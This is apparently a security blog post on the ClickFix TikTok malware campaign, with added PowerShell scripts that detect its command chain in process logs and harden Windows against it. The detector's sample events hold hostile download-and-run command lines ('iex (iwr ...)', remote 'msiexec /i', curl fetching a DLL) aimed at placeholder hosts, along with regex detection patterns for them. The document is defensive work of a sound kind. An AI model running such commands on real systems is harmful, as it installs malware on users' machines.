ClickFix Campaign on Social Media
ClickFix, a dangerous social engineering tactic, is spreading malware through TikTok videos. The videos trick users into running harmful PowerShell commands, typically by promising to activate software such as Spotify or Microsoft Office. The campaign, active in May 2025, delivers Vidar and StealC malware.
How the Attack Works
The videos guide users to open the Windows Run dialog by pressing “Windows + R”, launch PowerShell from it, and then copy and execute a command shown in the video. That command downloads and runs the malware directly in memory.
Malware Payload and Execution
The executed command uses MSIExec to install a package from a remote URL. The package contains a legitimate NVIDIA application that is abused to sideload a malicious DLL, and the DLL in turn uses curl to fetch the main payload. Because execution stays in memory, the malware avoids many detection mechanisms.
Targeting Pirated Software Users
Attackers target users looking for pirated apps or premium features. TikTok accounts posted the misleading videos; one video reached nearly 500,000 views before the account was shut down. The campaign therefore exploits users’ trust in a popular platform.
Latrodectus and Other Malware
ClickFix is also used to distribute Latrodectus, a downloader linked to the IcedID developers. First seen in 2023, Latrodectus deploys additional payloads such as ransomware. A report notes its use in email campaigns by threat actors; however, Operation Endgame disrupted its infrastructure in May 2025.
Why It’s Hard to Detect
The malware runs in memory rather than being written to disk, which bypasses traditional antivirus tools; browsers and security software alike struggle to spot it. As a result, users remain unaware of the infection until it is too late.
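Memory-only execution leaves little for file scanners, but the chain described above still has to be typed into the Run dialog and spawn processes, and those events are logged. The following PowerShell is an added example, not code from the original article: it scores process-creation records (the CommandLine and ParentImage fields of Sysmon Event ID 1, or the equivalent fields of Windows 4688 events) against the three steps the article names, and it also inspects the Run dialog's own history. All sample records and the example.invalid URLs are constructed for this demonstration; the indicator names and function names are my own.

```powershell
# Added example, not code from the original article. Scores process-creation
# records against the ClickFix chain: PowerShell launched from the Run dialog,
# msiexec installing from a remote URL, curl fetching a follow-on payload.
# Sample records and example.invalid URLs are constructed for the demo.

$Indicators = @(
    @{ Name    = 'msiexec-remote-install'
       Pattern = '(?i)\bmsiexec(\.exe)?\b.*\s[/-]i\s+https?://' },
    @{ Name    = 'powershell-hidden-download'
       Pattern = '(?i)\bpowershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-enc|invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b)' },
    @{ Name    = 'curl-to-binary'
       Pattern = '(?i)\bcurl(\.exe)?\b.*https?://.*(\s-o|--output)\s+\S+\.(exe|dll|msi)\b' }
)

function Test-ClickFixCommandLine {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$ParentImage = ''
    )
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($i in $Indicators) {
        if ($CommandLine -match $i.Pattern) { $hits.Add($i.Name) }
    }
    # A shell whose parent is explorer.exe is exactly what the Run dialog
    # produces. Alone that is normal, so it only strengthens another hit.
    if ($hits.Count -gt 0 -and $ParentImage -match '(?i)\\explorer\.exe$') {
        $hits.Add('launched-from-run-dialog')
    }
    return ,$hits
}

function Get-SuspiciousRunHistory {
    # The Run dialog stores what users typed under RunMRU; each value ends in "\1".
    $key   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { return @() }
    $entries = $props.PSObject.Properties |
        Where-Object  { $_.Name -match '^[a-z]$' } |
        ForEach-Object { $_.Value -replace '\\1$', '' }
    return @($entries | Where-Object { (Test-ClickFixCommandLine -CommandLine $_).Count -gt 0 })
}

# Constructed sample events, in the shape of Sysmon Event ID 1 fields.
$SampleEvents = @(
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell -w hidden -c "iex (iwr https://example.invalid/activate.txt)"' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'msiexec /i https://example.invalid/activate.msi /qn' },
    [pscustomobject]@{ ParentImage = 'C:\Users\Public\nvidia-app.exe'
                       CommandLine = 'curl.exe -s https://example.invalid/stage2.bin -o C:\Users\Public\stage2.dll' },
    [pscustomobject]@{ ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'powershell Get-ChildItem C:\Temp' }   # benign control case
)

foreach ($e in $SampleEvents) {
    $hits    = Test-ClickFixCommandLine -CommandLine $e.CommandLine -ParentImage $e.ParentImage
    $verdict = if ($hits.Count -gt 0) { 'SUSPICIOUS' } else { 'ok' }
    '{0,-10} {1}  [{2}]' -f $verdict, $e.CommandLine, ($hits -join ',')
}

# Live check of this user's Run dialog history (empty on a clean machine).
Get-SuspiciousRunHistory
```

The first three sample events each trigger one indicator (the first two also gain launched-from-run-dialog because of their parent), and the benign fourth event produces no hit. To run this over real telemetry, feed the CommandLine and ParentImage fields from `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }` into Test-ClickFixCommandLine; the patterns are deliberately narrow, so tune them against your own baseline before alerting on them.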
Preventing ClickFix Malware Attacks
To stop ClickFix, disable the Windows Run dialog via Group Policy, or turn off the “Windows + R” hotkey through the Registry. Use antivirus software that monitors for suspicious commands, and avoid following unverified online tutorials. Additionally, verify software sources before installation. These steps help protect against malware and data theft.
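The two technical controls above map to specific policy registry values. The following PowerShell is an added example, not code from the original article: it audits and, on request, applies the NoRun Explorer policy (the Group Policy setting “Remove Run menu from Start Menu”, which also blocks Windows + R for that user) and enables PowerShell script block logging so that any command pasted from a video is recorded in the PowerShell Operational log. The control list, function names and output layout are my own; the registry paths are the standard policy locations.

```powershell
# Added example, not code from the original article. Audits and applies the
# two controls recommended above. Run elevated for the HKLM path; the HKCU
# NoRun value applies to the current user (deploy it via Group Policy for all).

$Controls = @(
    @{ Name     = 'Remove Run dialog (Start Menu and Taskbar > Remove Run menu from Start Menu)'
       Path     = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
       Value    = 'NoRun'
       Expected = 1 },
    @{ Name     = 'PowerShell script block logging'
       Path     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
       Value    = 'EnableScriptBlockLogging'
       Expected = 1 }
)

function Get-ClickFixHardeningState {
    # Reports each control's current value and whether it matches the expected one.
    foreach ($c in $Controls) {
        $current = (Get-ItemProperty -Path $c.Path -Name $c.Value -ErrorAction SilentlyContinue).($c.Value)
        [pscustomobject]@{
            Control   = $c.Name
            Setting   = "$($c.Path)\$($c.Value)"
            Current   = if ($null -eq $current) { 'not set' } else { $current }
            Compliant = ($current -eq $c.Expected)
        }
    }
}

function Set-ClickFixHardening {
    # Creates the policy keys if missing and writes the expected DWORD values.
    # Supports -WhatIf so the change can be previewed before it is applied.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($c in $Controls) {
        $target = "$($c.Path)\$($c.Value)"
        if ($PSCmdlet.ShouldProcess($target, "set DWORD to $($c.Expected)")) {
            if (-not (Test-Path -Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
            New-ItemProperty -Path $c.Path -Name $c.Value -PropertyType DWord `
                             -Value $c.Expected -Force | Out-Null
        }
    }
    Get-ClickFixHardeningState
}

Get-ClickFixHardeningState | Format-Table -AutoSize
# Set-ClickFixHardening -WhatIf    # preview; drop -WhatIf to apply, then re-audit
```

The audit runs without elevation and prints both settings as “not set” on an unhardened machine. Applying NoRun takes effect at the next logon or after Explorer restarts; if the machine is domain-joined, set the same values through a Group Policy Object instead, since local edits under Policies are overwritten at the next policy refresh.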
Sleep well, we’ve got you covered.